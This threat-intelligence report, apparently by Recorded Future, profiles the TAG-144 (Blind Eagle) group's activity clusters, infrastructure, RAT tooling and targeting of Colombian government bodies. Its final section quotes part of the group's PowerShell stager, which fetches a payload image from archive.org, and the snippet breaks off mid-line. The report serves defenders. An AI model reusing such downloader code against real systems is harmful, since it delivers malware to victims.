Note: The analysis cut-off date for this report was July 21, 2025.

Executive Summary

Insikt Group has identified five distinct activity clusters linked to TAG-144 (also known as Blind Eagle). These clusters have operated at various times throughout 2024 and 2025, targeting a significant number of victims, primarily within the Colombian government across local, municipal, and federal levels. Although the clusters share similar tactics, techniques, and procedures (TTPs) such as leveraging open-source and cracked remote access trojans (RATs), dynamic domain providers, and legitimate internet services (LIS) for staging, they differ significantly in infrastructure, malware deployment, and other operational methods. Insikt Group also found further evidence linking TAG-144 to Red Akodon and identified various compromised Colombian government email accounts likely used in spearphishing campaigns.

To protect against TAG-144, security defenders should block IP addresses and domains tied to associated RATs, flag and potentially block connections to unusual LIS, and deploy updated detection rules (YARA, Sigma, Snort) for current and historic infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for implementation guidance and Appendix B for a complete list of IoCs. In the long term, analysts should continuously monitor the cybercriminal ecosystem for emerging threats and adapt controls accordingly.

Key Findings

• Insikt Group has tracked five distinct activity clusters associated with TAG-144 (Blind Eagle), each displaying overlapping yet varied TTPs and collectively targeting numerous victims, primarily within the Colombian government, throughout 2024 and 2025.


• TAG-144 appears to maintain an extensive operational infrastructure, comprising virtual private servers (VPS), IP addresses within Colombian ISP ranges, and servers that appear to function as VPN servers. These typically host domains registered through various dynamic DNS services such as duckdns[.]org, noip[.]com, and con-ip[.]com, among others.


• TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS RAT, XWorm, and LimeRAT, among others. These payloads are typically deployed through a multi-stage infection chain that leverages an expanding set of LIS and uses steganography to obscure malicious content and evade detection.

Background

TAG-144, also known as Blind Eagle, AguilaCiega, APT-C-36, and APT-Q-98, is a threat group that has been active since at least 2018, primarily targeting South America, especially Colombia. While the threat group’s overall motivation remains ambiguous, its activity reflects both cyber-espionage and financially driven motivations. TAG-144’s primary focus appears to be on credential theft, evidenced by banking-related keylogging and browser monitoring, alongside indications of espionage, such as persistently targeting government entities and using modified RATs with surveillance functions (1, 2).

The group’s primary targets include government institutions, especially judiciary and tax authorities, alongside financial entities, petroleum and energy companies, and organizations within the education, healthcare, manufacturing, and professional services sectors (1, 2). Operations are mainly focused on Colombia, with additional activity in Ecuador, Chile, and Panama, and occasional campaigns in North America targeting Spanish-speaking users.

Initial access typically occurs through spearphishing campaigns impersonating local government agencies, most notably Colombian authorities. These campaigns leverage themes such as debt collection and judicial notifications to lure victims into opening malicious documents (1, 2). They have often used URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to to conceal malicious links and target users geographically. TAG-144 employs geo-fencing and other detection evasion measures that block access from outside Colombia or Ecuador, redirecting outsiders to official government websites. TAG-144 has consistently leveraged compromised email accounts in its spearphishing campaigns, including those associated with government entities and private individuals.

TAG-144 leverages a range of commodity remote access trojans (RATs), including AsyncRAT, REMCOS RAT, DcRAT, njRAT, LimeRAT, QuasarRAT, BitRAT, and a Quasar variant known as BlotchyQuasar. Its tooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”, with indicators pointing to the use of crypter-as-a-service offerings such as CryptersAndTools, which originates from Brazil. Additionally, it employs steganography techniques, embedding malicious payloads within image files to evade detection.

TAG-144’s command-and-control (C2) infrastructure often incorporates IP addresses from Colombian ISPs alongside virtual private servers (VPS) such as Proton666 and VPN services like Powerhouse Management, FrootVPN, and TorGuard (1, 2). This setup is further enhanced by the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com. The threat group is suspected, though not definitively confirmed, to use compromised routers, which are then repurposed as reverse proxies to obscure the true locations of their C2 servers and complicate attribution.

The threat group has consistently leveraged LIS, particularly during the payload staging phase. These services include widely used platforms like Bitbucket, Discord, Dropbox, GitHub, Google Drive, Paste.ee, and lesser-known platforms such as undisclosed Brazilian image-hosting websites. Additionally, the group has been observed using compromised accounts to host malicious content, including a Google Drive folder tied to a compromised account associated with a regional Colombian government organization.

The threat group's origin remains uncertain, though multiple studies suggest it operates within the UTC-5 or UTC-4 time zones (1, 2), consistent with countries like Colombia and Ecuador, with some research specifically pointing to Colombia as its base. Notably, technical artifacts have contained both Spanish- and Portuguese-language comments. The Spanish observed in the comments closely resembles the regional dialects commonly spoken in the targeted countries. Additionally, the threat group has been observed using tools and services tied to the Brazilian cybercriminal underground, indicating a possible connection with Brazilian threat actors.

Three key factors set TAG-144 apart within the cybercriminal ecosystem. First, while globalization, cybercriminal collaboration, and hardware/software standardization have lowered barriers for threat actors to operate globally, threat actors, including TAG-144, often remain regionally focused due to cultural nuances, tacit knowledge, and persistence. Second, despite some tooling improvements, TAG-144 has largely relied on consistent techniques since its emergence. Their continued success, reflected in a high number of victims, underscores how well-established methods remain effective over time. Lastly, TAG-144 exemplifies the increasingly blurred lines between cybercrime and espionage, a trend that has become more prominent in the coming year. In this context, a comprehensive approach to tackling cyber threats becomes even more crucial, requiring improved defenses, deeper regional knowledge, and enhanced coordination.

Threat Analysis

Insikt Group identified five activity clusters associated with TAG-144 that were active between May 2024 and July 2025 (see Figure 1). Activity periods were determined based on domain resolutions, sample submissions, and victim traffic, as observed through Recorded Future® Network Intelligence.

Figure 1: Cluster activity timelines (Source: Recorded Future)

The following clusters have been observed:

• Cluster 1, active from February through July 2025, comprises C2 IPs primarily associated with TorGuard VPN and one Colombian ISP hosting duckdns[.]org and, starting in July 2025, noip[.]com domains with static resolution and minimal rotation. Cluster 1 is linked to DcRAT, AsyncRAT, and REMCOS RAT infections targeting Colombian government entities exclusively.


• Cluster 2, active between September and December 2024, included C2 IPs tied to AS-COLOCROSSING, Colombian ISPs, and VULTR hosting duckdns[.]org, con-ip[.]com, and kozow[.]com domains. Cluster 2 is associated with AsyncRAT activity targeting the Colombian government and entities in the education, defense, and retail sectors.


• Cluster 3, active from September 2024 to July 2025, consists of C2 IPs linked to Colombian ISP UNE EPM hosting duckdns[.]org and, occasionally, con-ip[.]com domains. Cluster 3 is associated with both AsyncRAT and REMCOS RAT deployments.


• Cluster 4, active from May 2024 to February 2025, is notable for combining malware and phishing infrastructure attributed to TAG-144.


• Cluster 5, active from March to July 2025, consists of C2 IPs linked to GLESYS (AS42708) hosting dynamically resolving duckdns[.]org domains. Cluster 5 is associated with LimeRAT and a cracked AsyncRAT variant seen in Clusters 1 and 2.

Insikt Group identified infrastructure overlaps between the clusters, establishing a connection among them. Additionally, the clusters share notable similarities in TTPs, including infrastructure choices, domain naming patterns, malware deployment, and the abuse of LIS. However, each cluster also exhibits distinct differences, which are explored in detail in the following sections of this report.

Cluster 1

Infrastructure Analysis

Cluster 1, active from at least February through July 2025, comprises C2 IP addresses primarily linked to TorGuard VPN servers and, in one case, a Colombian ISP. This cluster typically hosts duckdns[.]org and, more recently, noip[.]com domains with specific naming patterns; it has also been observed deploying DcRAT, AsyncRAT, and REMCOS RAT. The IP addresses linked to Cluster 1 are listed in Appendix A. The domains consistently resolve to the same static IP addresses over time, with minimal rotation observed within Cluster 1.

The subdomain names, likely generated by a domain generation algorithm (DGA), commonly include the word “envio” followed by a numeric part, as in, for example, envio16-05[.]duckdns[.]org. The names are detectable via the regex in Figure 2 and are detailed in Appendix B.

Figure 2: Regex for suspected DGA linked to Cluster 1 (Source: Recorded Future)

While prior research has suggested that the TorGuard VPN servers associated with Cluster 1 are used for port forwarding, the exposure of C2 components, such as default transport layer security (TLS) certificates tied to deployed malware families, indicates these IP addresses are likely dedicated VPN instances directly controlled by TAG-144.

In addition to the TorGuard VPN servers, Cluster 1 includes IP addresses associated with Colombian ISPs, such as Colombia’s primary provider, COLOMBIA TELECOMUNICACIONES S.A. E.S.P. While earlier reporting on Blind Eagle in 2020 suggested the possible use of compromised routers for C2 infrastructure, Insikt Group has not confirmed such activity for the observed IP addresses.

Notably, several domains hosted on TorGuard VPN servers listed in Appendix A were previously resolved to IP addresses belonging to Colombian ISPs, such as trabajonuevos[.]duckdns[.]org. These IP addresses and their associated domains are detailed in Appendix A. Similarly, certain domains, such as diazpool14[.]duckdns[.]org, were previously hosted on IP addresses linked to GLESYS (AS42708), an ASN identified in association with Cluster 5.

Abuse of Legitimate Internet Services, Including lovestoblog[.]com

As is typical for TAG-144, Cluster 1 has leveraged various LIS during staging, such as Tagbox, Archive, Paste.ee, Discord, and BitBucket, and for the first time in TAG-144 activity, the free hosting platform lovestoblog[.]com by InfinityFree. More specifically, the subdomain sudo102[.]lovestoblog[.]com hosted several text files that loaded an encoded PowerShell script, which retrieved the next stage of the infection chain from a JPG image hosted on archive[.]org. (See Figure 3 for the infection chain; line breaks were added for readability.)

$craploads = 'SilentlyContinue'
$islamist = 'https://archive[.]org/download/new_image_20250531_1942/new_image.jpg'
$seiche = New-Object System.Net.WebClient
$seiche.Headers.Add('User-Agent', 'Mozilla/5.0')
[byte[

Source: RecordedFuture
Source Link: https://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations